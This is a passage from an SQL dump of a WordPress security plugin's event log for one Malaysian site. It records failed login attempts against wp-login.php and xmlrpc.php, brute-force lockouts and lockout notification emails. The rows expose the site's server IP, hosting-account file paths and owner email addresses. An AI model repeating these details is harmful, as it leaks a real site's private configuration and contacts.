17:37:43',17739872,19230360,'https://bintara.com.my/wp-login.php',1,0,'34.76.36.242'),(24666,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"34.76.36.242\";s:11:\"REMOTE_PORT\";s:5:\"59532\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEZ6vgg4cIpXyxKa544QAAAAEE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568741866.294\";s:12:\"REQUEST_TIME\";s:10:\"1568741866\";}}','notice','2019-09-17 17:37:48','2019-09-17 17:37:46',18254000,19554320,'https://bintara.com.my/xmlrpc.php',1,0,'34.76.36.242'),(24667,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"89\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"67.205.180.16\";s:11:\"REMOTE_PORT\";s:5:\"51772\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEb3H-mRYMgL5SYt2ETHwAAAUs\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568742365.3914\";s:12:\"REQUEST_TIME\";s:10:\"1568742365\";}}','notice','2019-09-17 17:46:08','2019-09-17 17:46:05',17739328,19231624,'https://bintara.com.my/wp-login.php',1,0,'67.205.180.16'),(24668,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"67.205.180.16\";s:11:\"REMOTE_PORT\";s:5:\"53740\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEb5kViJhUiKk@yAofB0gAAAYw\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568742374.5803\";s:12:\"REQUEST_TIME\";s:10:\"1568742374\";}}','notice','2019-09-17 17:46:17','2019-09-17 17:46:15',18257720,19555920,'https://bintara.com.my/xmlrpc.php',1,0,'67.205.180.16'),(25641,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:33:06\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:33:06\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:48:06\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:48:06\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:33:07','2019-09-21 11:33:06',17882264,19287992,'https://bintara.com.my/wordpress/wp-login.php',1,0,'138.68.18.66'),(25642,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:33:07','2019-09-21 11:33:06',18088304,19287992,'https://bintara.com.my/wordpress/wp-login.php',1,0,'138.68.18.66'),(25643,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYKlHkXpgmG5P@iB8kYKAAAAJE\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"62.162.103.206\";s:11:\"REMOTE_PORT\";s:5:\"40238\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYKlHkXpgmG5P@iB8kYKAAAAJE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569065620.2352\";s:12:\"REQUEST_TIME\";s:10:\"1569065620\";}}','notice','2019-09-21 11:33:41','2019-09-21 11:33:40',17800016,19289880,'https://bintara.com.my/test/wp-login.php',1,0,'62.162.103.206'),(25638,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:33:03\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:33:03\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:48:03\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:48:03\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:33:05','2019-09-21 11:33:03',17882000,19287488,'https://bintara.com.my/wordpress/wp-login.php',1,0,'64.41.83.26'),(25639,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:33:05','2019-09-21 11:33:03',18087712,19287488,'https://bintara.com.my/wordpress/wp-login.php',1,0,'64.41.83.26'),(25640,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYKcXkXpgmG5P@iB8kX@wAAAJY\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"138.68.18.66\";s:11:\"REMOTE_PORT\";s:5:\"33965\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYKcXkXpgmG5P@iB8kX@wAAAJY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569065585.981\";s:12:\"REQUEST_TIME\";s:10:\"1569065585\";}}','notice','2019-09-21 11:33:07','2019-09-21 11:33:06',17797584,19287992,'https://bintara.com.my/wordpress/wp-login.php',1,0,'138.68.18.66'),(25636,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:33:01','2019-09-21 11:33:00',18090784,19290072,'https://bintara.com.my/wp/wp-login.php',1,0,'158.69.27.201'),(25637,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYKb1iJ7D9Gn7wDPh8YrgAAANE\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:11:\"64.41.83.26\";s:11:\"REMOTE_PORT\";s:5:\"36358\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYKb1iJ7D9Gn7wDPh8YrgAAANE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569065583.4423\";s:12:\"REQUEST_TIME\";s:10:\"1569065583\";}}','notice','2019-09-21 11:33:05','2019-09-21 11:33:03',17797160,19287488,'https://bintara.com.my/wordpress/wp-login.php',1,0,'64.41.83.26'),(25635,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:33:00\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:33:00\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:48:00\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:48:00\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:33:01','2019-09-21 11:33:00',17885064,19290072,'https://bintara.com.my/wp/wp-login.php',1,0,'158.69.27.201'),(25632,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:32:25\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:32:25\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:47:25\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:47:25\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:32:26','2019-09-21 11:32:25',17884552,19290072,'https://bintara.com.my/blog/wp-login.php',1,0,'5.135.183.49'),(25633,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:32:26','2019-09-21 11:32:25',18090528,19290072,'https://bintara.com.my/blog/wp-login.php',1,0,'5.135.183.49'),(25634,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYKa3kXpgmG5P@iB8kX9gAAAJM\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"158.69.27.201\";s:11:\"REMOTE_PORT\";s:5:\"41586\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"S